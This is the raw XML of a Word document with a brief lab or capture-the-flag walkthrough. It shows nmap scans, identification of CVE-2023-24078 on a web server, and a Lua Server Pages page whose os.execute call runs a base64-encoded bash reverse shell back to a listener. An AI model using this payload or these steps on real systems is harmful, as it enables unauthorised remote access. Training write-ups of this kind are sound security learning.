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07054B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A902A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hub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7979277E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A902A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A902A1" w:rsidRPr="00A902A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> nmap -vv -p- -T5 192.168.201.25 -oN open_ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52999D37" w14:textId="6B8D8767" w:rsidR="00843DCE" w:rsidRDefault="00A902A1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A902A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>udo nmap -O -sV -sC -p 22,80,8082,9999 192.168.201.25 -oN nmap_scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539D8471" w14:textId="77777777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4E2967E" w:rsidR="00843DCE" w:rsidRDefault="00A902A1" w:rsidP="00843DCE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Go to </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="000E21B4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://192.168.201.25:8082</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="592EB426" w14:textId="08CAC857" w:rsidR="00A902A1" w:rsidRDefault="00A902A1" w:rsidP="00843DCE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Click on the header “About” and check the version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BC7AA5" w14:textId="26C9FA2D" w:rsidR="00A902A1" w:rsidRDefault="00A902A1" w:rsidP="00843DCE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Google shows us CVE-2023–24078</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DB1A1E" w14:textId="30CA1494" w:rsidR="00A902A1" w:rsidRDefault="00A902A1" w:rsidP="00843DCE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It doesn’t match the version but you can try</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20546A0A" w14:textId="77777777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BE531C2" w14:textId="771C7040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CVE-2023–24078 manually step by step</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B2A515" w14:textId="190B4774" w:rsid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Create a User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FF2AD2" w14:textId="03F59EAD" w:rsid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Go to “Private Page”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0788AE04" w14:textId="1481D844" w:rsid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Go to “page manager”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FA26BA" w14:textId="76CAD716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Create New Page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEBA2A1" w14:textId="1E26034A" w:rsidR="00843DCE" w:rsidRDefault="00A902A1" w:rsidP="00843DCE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Edit Page </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2CCD90" w14:textId="153BBC4E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 w:rsidRPr="00A902A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Start the listener on Kali before clicking Save</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5857222F" w14:textId="3CDE378F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 w:rsidRPr="00A902A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Get Payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> from shell generator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EA9B7C" w14:textId="77777777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6. Shell Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CDB053" w14:textId="77777777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shell.lsp:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F21D71" w14:textId="77777777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&lt;div style=”margin-left:auto;margin-right: auto;width: 350px;”&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B606837" w14:textId="77777777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&lt;div id=”info”&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00A902A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>&lt;h2&gt;Lua Server Pages Reverse Shell&lt;/h2&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00A902A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>&lt;p&gt;Delightful, isn’t it?&lt;/p&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00A902A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8B0309" w14:textId="77777777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&lt;?lsp if request:method() == “GET” then ?&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00A902A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>&lt;?lsp os.execute(“echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjgueHgueHh4LzIyIDA+JjE= | base64 -d | bash”) ?&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00A902A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>&lt;?lsp else ?&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00A902A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>You sent a &lt;?lsp=request:method()?&gt; request</w:t>
      </w:r>
      <w:r w:rsidRPr="00A902A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>&lt;?lsp end ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C005041" w14:textId="77777777" w:rsidR="00A902A1" w:rsidRPr="00A902A1" w:rsidRDefault="00A902A1" w:rsidP="00A902A1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A902A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CC8CBC" w14:textId="6F046C9A" w:rsidR="00843DCE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get shell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E75BBFC" w:rsidR="00843DCE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-l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4183D0A1" w14:textId="01D7A39F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get the infor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DCFDE8" w14:textId="3533BB09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search google and find the exploit of it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0478B4DE" w14:textId="4F660639" w:rsidR="00A902A1" w:rsidRDefault="00A902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got the shell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6A8FD023" w:rsidR="00843DCE" w:rsidRPr="00843DCE" w:rsidRDefault="00A902A1" w:rsidP="00A902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of root its proff.txt file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757ACB"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A5666B"/>
    <w:rsid w:val="00A902A1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201.25:80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</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-25T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-03T16:57:00Z</dcterms:modified>
</cp:coreProperties>
</file>